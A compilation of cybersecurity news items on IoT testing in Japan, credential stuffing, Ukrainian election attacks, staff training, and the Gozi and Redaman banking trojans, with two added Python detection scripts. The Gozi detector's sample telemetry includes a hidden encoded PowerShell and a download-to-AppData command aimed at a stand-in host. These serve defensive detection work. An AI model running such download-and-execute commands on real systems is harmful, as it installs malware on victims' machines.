Japanese Government to “Pen Test” Citizen’s IoT Devices Ahead of Olympics

The Japanese Ministry of Internal Affairs and Communications revealed in a recent report that two-thirds of cyber attacks in 2016 were aimed at Internet of Things (IoT) devices. This, coupled with preparations for the 2020 Olympics, resulted in the Japanese Government passing a law that allows penetration testing of citizens’ IoT devices.

This will form part of a survey by the National Institute of Information and Communications Technology (NICT). Working with Japan’s Ministry of Internal Affairs and Communications, the NICT will compile a list of unsecured devices and pass it on to Internet Service Providers (ISPs). The authorities and ISPs will then tell the affected individuals which weaknesses, such as weak passwords, they need to remedy. The NICT will test over 200 million IoT devices, including cameras, appliances and routers.

IoT is a target for hackers

Growing dependence on machines and on the internet has led to the two being combined into what is now called the Internet of Things. Most household devices, from kitchen appliances to the refrigerator, can now connect to the internet as a smart way to manage them. This brings benefits, including the ability to make the most of the data they produce and to provide a convenient and efficient service or lifestyle. Passwords, however, remain the most common authentication method on these devices. A weak password therefore makes it easy to recruit IoT devices and routers into botnets, which take over the devices and disrupt the services they provide.

Testing is crucial

In the lead-up to previous Olympic Games, governments have tested their IT infrastructure in an attempt to reduce the chances of successful attacks. For example, Rio carried out around 8,000 tests, which found 400 flaws, and 125 of the tests revealed susceptibility to malware attacks. Attackers target the Olympics because it is a global event that draws the attention of many countries. It is also a platform that offers nation-state attackers big opportunities for publicity and valuable information, and it provides a profitable target for cybercrime groups.

The law passed by the Japanese government is crucial in light of attacks on past public events. At the Pyeongchang Winter Olympics in South Korea, the Olympic Destroyer malware, deployed in 2018, affected internet and television services. In another instance, the Ukrainian intelligence service reported that Russian hackers attempted to use VPNFilter to disrupt broadcasts of the 2017 UEFA Champions League final. Other Olympic attacks include DDoS attacks on power systems at the 2012 London Olympics. Although a majority of attacks were successfully mitigated, the Rio Olympics in 2016 succumbed to DDoS attacks, one of which became the longest 500Gbps+ attack to date.

The project will start next month. Japan is also using other measures, such as facial recognition, to tackle threats to the 2020 Games.


DailyMotion Victim of Credential Stuffing Attack

Popular video sharing platform DailyMotion announced it has become the victim of a credential stuffing attack. According to an email sent to affected customers, the attack started over the weekend beginning January 19.

DailyMotion is one of the most popular video-sharing sites and is ranked number 134 on the Alexa traffic ranking.

What is Credential Stuffing?

A number of sites have been hit by these attacks in recent months. Credential stuffing is a security term for attackers gaining access to accounts on one site using usernames and passwords leaked from another. The credentials are usually obtained from breaches of other sites and then tried against different sites, relying on users having reused the same password.

According to the email from DailyMotion, the attack was successful in some cases. It confirmed that hackers were able to gain access to a limited number of accounts.

Discovery of the Attack

The video platform said its security team discovered the attack and took steps to block it. From last Saturday, the company has been logging off users it believes were affected and resetting their passwords.

The company sent an email to affected customers with a link to reset their passwords. It also notified the CNIL (Commission nationale de l’informatique et des libertés), France’s data protection authority, which all companies in France are required to inform under GDPR legislation.

Other Attacks

Other companies have suffered credential stuffing attacks in recent months. In September, ad-blocker company AdGuard became a victim. In November, global bank HSBC and restaurant chain Dunkin’ Donuts were also attacked.

Two weeks ago, social platform Reddit announced that it had become a victim. They stated hackers had gained access to some accounts following the attack.

DailyMotion suffered a previous security breach in 2016. On that occasion, a hacker managed to steal 85.2 million unique email addresses and usernames, as well as 18.3 million passwords from users’ accounts.

Banking trojan Gozi resurfaces with new tactics

Gozi, a twelve-year-old banking trojan, has resurfaced with new techniques for stealing users’ financial credentials. Using common strategies such as keylogging, recording information and extracting saved passwords, the attackers use the data to steal identities and users’ funds.

In the past the trojan targeted users who downloaded compromised software, or was bundled with browser hijackers to deliver further malware such as adware. Those affected included business customers, researchers and financial institutions. A single campaign of this trojan could compromise over 5,200 hosts and 10,000 users. Once on a device, its method of stealing data is the same as that of other malware.

New tactics

Since the malware’s source code leaked, malware distributors have released many versions, and Ursnif has become the most commonly used variant. This may be because it runs in a different way. Although it is still spread by a traditional spam email with an attached document containing malicious macros, the malware itself is not deployed from the attached document. Instead, the obfuscated macro code runs a PowerShell command (PowerShell is normally used to manage administrative tasks), which in turn runs a second PowerShell command that downloads the malware executable to the user’s AppData directory. The PowerShell is launched through the Windows Management Instrumentation Command-line (WMIC), and the downloaded code then runs, deploying the malware. This makes the email and attachment look less suspicious and makes it easier for the malware to remain undetected on the user’s device.
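The chain just described (Office document, then WMIC, then PowerShell launching a second PowerShell that writes to AppData) is unusual for legitimate software and is visible in process-creation telemetry as a parent-child relationship. The script below is an added example, not code from the original article or from Cisco Talos. The events are constructed; their fields (pid, ppid, image path, command line) are assumptions that mirror the shape of Sysmon process-creation records, and the rule thresholds are illustrative.

```python
"""Flag an Office-macro -> WMIC -> PowerShell -> PowerShell chain in
process-creation telemetry.

Added example, not from the original article or Cisco Talos. Event field
names follow the shape of Sysmon process-creation records; the events
themselves are constructed for illustration.
"""
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wmic.exe", "powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
DOWNLOAD_HINTS = ("downloadfile", "downloadstring", "invoke-webrequest", "-enc")

# Constructed sample telemetry (not real). One tree matches the chain from
# the article; pid 300 is a user-launched PowerShell and should not be flagged.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "cmdline": "WINWORD.EXE invoice.doc"},
    {"pid": 210, "ppid": 200, "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": 'wmic process call create "powershell -w hidden -enc <base64-placeholder>"'},
    {"pid": 220, "ppid": 210, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -enc <base64-placeholder>"},
    {"pid": 230, "ppid": 220, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -c (New-Object Net.WebClient).DownloadFile("
                "'http://example.invalid/p','C:\\Users\\u\\AppData\\Roaming\\p.exe')"},
    {"pid": 300, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell Get-ChildItem"},
]


def basename(path):
    """Lower-case file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def build_ancestry(events):
    """Map each pid to its ancestors' image names, nearest parent first."""
    by_pid = {e["pid"]: e for e in events}

    def chain(pid):
        out, seen = [], set()
        cur = by_pid.get(pid)
        while cur and cur["ppid"] in by_pid and cur["ppid"] not in seen:
            seen.add(cur["ppid"])  # guard against pid reuse loops
            cur = by_pid[cur["ppid"]]
            out.append(basename(cur["image"]))
        return out

    return {e["pid"]: chain(e["pid"]) for e in events}


def suspicious_chains(events):
    """Return [(pid, [reasons])] for script hosts whose lineage or command line
    matches the macro -> WMIC -> PowerShell -> download-to-AppData pattern."""
    ancestry = build_ancestry(events)
    findings = []
    for e in events:
        img = basename(e["image"])
        if img not in SCRIPT_HOSTS:
            continue
        anc = ancestry[e["pid"]]
        reasons = []
        if any(a in OFFICE_APPS for a in anc):
            reasons.append("script host descended from an Office application")
        if img == "powershell.exe" and "wmic.exe" in anc:
            reasons.append("PowerShell launched via WMIC")
        if img == "powershell.exe" and anc[:1] == ["powershell.exe"]:
            reasons.append("PowerShell spawning PowerShell")
        cl = e["cmdline"].lower()
        if "appdata" in cl and any(h in cl for h in DOWNLOAD_HINTS):
            reasons.append("download or encoded command writing under AppData")
        if reasons:
            findings.append((e["pid"], reasons))
    return findings


if __name__ == "__main__":
    for pid, reasons in suspicious_chains(SAMPLE_EVENTS):
        print(pid, "->", "; ".join(reasons))
```

Each stage of the chain is scored on its own, so the detection still fires if only part of the lineage is captured; the deepest PowerShell in the sample collects all four reasons.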

Endpoint antivirus software can help a user stay protected against most types of malware. Cisco Talos discovered Gozi through its own advanced malware protection software, and its website lists indicators of compromise to help stop users being infected.

Impending Ukraine Election Targeted by Hackers

Ukraine is reporting an increase in cyber attacks aimed at disrupting its upcoming presidential election. The Ukrainian Government believes that Russian state actors could be behind the disruption.

News Reports

The news agency Reuters reported that the attacks had intensified. These attacks, aimed at the Ukrainian Government and political parties, have a clear intent: to disrupt the presidential election, scheduled for March.

Suspected Russian Involvement

President Petro Poroshenko declared that Russia will try to interfere with Ukraine’s election process. Poroshenko also believes Ukraine has developed a strong cyber team to help counter this.

Speaking to foreign diplomats, Poroshenko stated: “This is not just our take. The Russian meddling to influence Ukraine’s elections is well underway.”

Threats From Actors

Actors are carrying out spear-phishing attacks against election officials, using stolen details bought on the dark web. Such techniques have been used against the Ukrainian energy, transport and banking industries in the past.

Speaking to Reuters, Serhiy Demedyuk said that attackers were sending greeting cards, shopping invitations and software updates infected with viruses. These viruses were then used to steal passwords and other personal information.

Demedyuk stated: “Ten weeks before the elections, hackers were also buying personal details of election officials.”

The Ukrainian authorities have confirmed that no hackers have managed to penetrate the national election infrastructure.

Previous Attack

A previous attack in 2017, NotPetya, hit thousands of computers in Ukraine. In that attack, allegedly Russian-linked hackers compromised the Ukrainian tax accounting software MeDoc.

Experts are concerned that a similar attack could hit critical infrastructure again. This would cause widespread problems across the country.

Russia has denied any involvement in these campaigns. Kremlin spokesperson Dmitry Peskov stated: “Russian state structures have never interfered, and are not interfering, in the internal affairs of other countries.”

Experts are continuing to monitor the situation in Ukraine as the presidential election campaign draws near.


Why it’s important for organizations to train staff in cybersecurity

Breaches are an ongoing issue that organisations face on a day-to-day basis. For as long as risk carries a level of uncertainty, preventing breaches is hard. But there is a difference between accepting this fact and doing nothing, and accepting it while making all reasonable efforts to stop breaches from taking place. One measure that organisations are observed to neglect in practice is training staff in cybersecurity. Here are just some of the reasons why staff training deserves more attention.

Social Engineering

Cybersecurity goes beyond the IT team, as staff play a significant part too. Because staff drive the organisation, hackers commonly use them as attack vectors. This is especially evident in the first stage of the cyber kill chain, which involves gathering information about the target. This is where attackers exploit weak spots to obtain the information they need to carry out the intended attack. Social engineering is just one of the tactics hackers use, but it is the most common because it is easy to deploy. They know about the general lack of training among staff, and sometimes it takes targeting only one person.

It is important for staff to be aware of social engineering because, together, they far outnumber the Board and the IT team. Areas organisations should alert staff to include what they post on social media and being manipulated into allowing unauthorised visitors onto the work site. In addition, phishing emails are still on the rise, growing more sophisticated each time, and show no signs of slowing down anytime soon. Staff need training on how to avoid becoming targets.

Human error leading to breaches

Recent articles have highlighted significant flaws within organisations. As Kaspersky Lab’s recent article reveals, human error still stands as one of the leading causes of breaches, yet it is dealt with poorly. Organisations are not learning from other organisations’ publicly reported failures. One example is Gloucestershire Police, where an employee accidentally emailed personal data belonging to victims of child abuse to unintended recipients. This is the most crucial reason why training is so important. Errors occur not only when emails are sent to the wrong recipients, but also through the use of compromised removable media, the loss of mobile devices containing business data and poor security management around these devices.

Other Benefits

Staff training should be part of an organisation’s cyber hygiene to help maintain security. Implementing training brings the following benefits:

Staff will know what information is vital to share and with whom.

The more knowledge staff have, the more they understand, and this enables them to build security into their everyday operations. Cybersecurity requires a team effort, as well as staff individually taking responsibility for their actions when handling data. Software and applications are one example. Departments tend to download and use tools that help with daily tasks without IT being aware of them; this is known as shadow IT. If the IT team does not know the software exists, it is hard for the team to maintain security within the organisation. If staff are made aware of the need for security and the dangers of unvetted extensions and applications, they will know when to liaise with the IT team and other relevant employees.


Banking Malware Redaman continues to strike

Redaman banking trojan

A recent spam campaign distributed the Redaman banking malware, targeting customers of Russian financial institutions. The campaigns were first detected in 2015 and have since affected users in Russia, the Netherlands, the US, Japan and Sweden. Reports further show that the malware distributors used servers based in Russia, Ukraine, Germany and Estonia. Palo Alto Networks noted over 100 cases in 2018 alone. The spam targeted email addresses ending in .ru.

How it works

The malware distributor uses the traditional method of sending spam email with an attached archive file, in formats including ZIP, RAR, GZ and 7Z. Once the user opens the extracted EXE file (which instructs the device to run it), the Redaman malware deploys and is free to carry out its objectives. The attachment is presented to the user as an ordinary PDF document. The email messages relate to payments owed, documents about money owed and payment verification. By being vague, the content heightens the user’s curiosity, making them feel they will understand more after reading it; by then they have clicked on the file and activated the malware. This message content targets those in financial difficulty or debt.

Behind the scenes, once executed, the malware checks whether it is running in a sandbox or emulator and exits if it finds that it is. If not, it continues by dropping a DLL file in the user’s temporary directory, AppData\Local\Temp\.

After creating a folder for itself, it moves the DLL into it. The malware then uses a Windows scheduled task to load the DLL each time the user logs into the device. It aims to stay undetected while monitoring the user’s activity, obtaining financial data and using it for fraudulent activity. To steal credentials, it downloads data directly from the PC or captures screenshots. Through keylogging, it can also pick up sensitive data such as passwords.
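The persistence described in the two paragraphs above leaves a concrete artefact to audit: a scheduled task with a logon trigger whose action loads a DLL from a folder under the user’s temporary directory. The script below is an added example and is not code from the original article or from Palo Alto Networks. It parses task definitions in the Task Scheduler XML format (namespace http://schemas.microsoft.com/windows/2004/02/mit/task, as exported by schtasks or read from C:\Windows\System32\Tasks); the two task definitions, the loader list and the path pattern are constructed assumptions for illustration.

```python
"""Audit Windows scheduled-task XML for a logon-triggered action that loads a
DLL from a user's AppData\\Local\\Temp directory.

Added example; not from the original article or Palo Alto Networks. The task
definitions below are constructed, following the Task Scheduler XML schema.
"""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Executables normally used to run a DLL from a task action (assumed list).
DLL_LOADERS = {"rundll32.exe", "regsvr32.exe"}
# A task whose action lives under the user's temp directory is unusual.
TEMP_DIR_RE = re.compile(r"\\appdata\\local\\temp\\", re.IGNORECASE)

# Constructed task matching the pattern in the article: logon trigger,
# rundll32 loading a DLL from a folder created under AppData\Local\Temp.
SUSPICIOUS_TASK = r"""
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <LogonTrigger><Enabled>true</Enabled></LogonTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Windows\System32\rundll32.exe</Command>
      <Arguments>C:\Users\user\AppData\Local\Temp\svc\update.dll,Start</Arguments>
    </Exec>
  </Actions>
</Task>
"""

# Constructed benign task: a vendor updater on a daily schedule.
BENIGN_TASK = r"""
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger><StartBoundary>2019-01-01T03:00:00</StartBoundary></CalendarTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Program Files\Vendor\updater.exe</Command>
      <Arguments>/silent</Arguments>
    </Exec>
  </Actions>
</Task>
"""


def parse_task(xml_text):
    """Return (trigger element names, [(command, arguments)]) from a task definition."""
    root = ET.fromstring(xml_text.strip())
    trig_el = root.find("t:Triggers", NS)
    triggers = [] if trig_el is None else [t.tag.split("}")[-1] for t in trig_el]
    actions = []
    for ex in root.findall("t:Actions/t:Exec", NS):
        cmd = (ex.findtext("t:Command", default="", namespaces=NS) or "").strip()
        args = (ex.findtext("t:Arguments", default="", namespaces=NS) or "").strip()
        actions.append((cmd, args))
    return triggers, actions


def assess_task(xml_text):
    """List the reasons a task resembles the DLL-from-temp persistence pattern."""
    triggers, actions = parse_task(xml_text)
    reasons = []
    for cmd, args in actions:
        loader = cmd.replace("/", "\\").rsplit("\\", 1)[-1].lower()
        if loader in DLL_LOADERS:
            reasons.append("action uses DLL loader " + loader)
        if TEMP_DIR_RE.search(cmd + " " + args):
            reasons.append("action references a file under AppData\\Local\\Temp")
    # Only report the trigger when the action itself already looks wrong.
    if reasons and "LogonTrigger" in triggers:
        reasons.append("runs at user logon")
    return reasons


def is_suspicious(xml_text):
    """True when both the loader and the temp-directory path are present."""
    return len(assess_task(xml_text)) >= 2


if __name__ == "__main__":
    for name, xml_text in (("suspicious", SUSPICIOUS_TASK), ("benign", BENIGN_TASK)):
        print(name, is_suspicious(xml_text), assess_task(xml_text))
```

Requiring both the loader and the temp-directory path before raising an alert keeps ordinary rundll32 tasks and ordinary temp-directory cleanup jobs from producing noise; the logon trigger is reported as supporting evidence rather than on its own.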

The Redaman spam campaigns’ characteristics are traditional with a twist. Although sent widely, the campaign targets a group of individuals within Russia and uses varied message content. It targets Russia while sending from within Russia, with the objective of stealing financial data. These are all characteristics found in cybercriminal and organised crime groups.
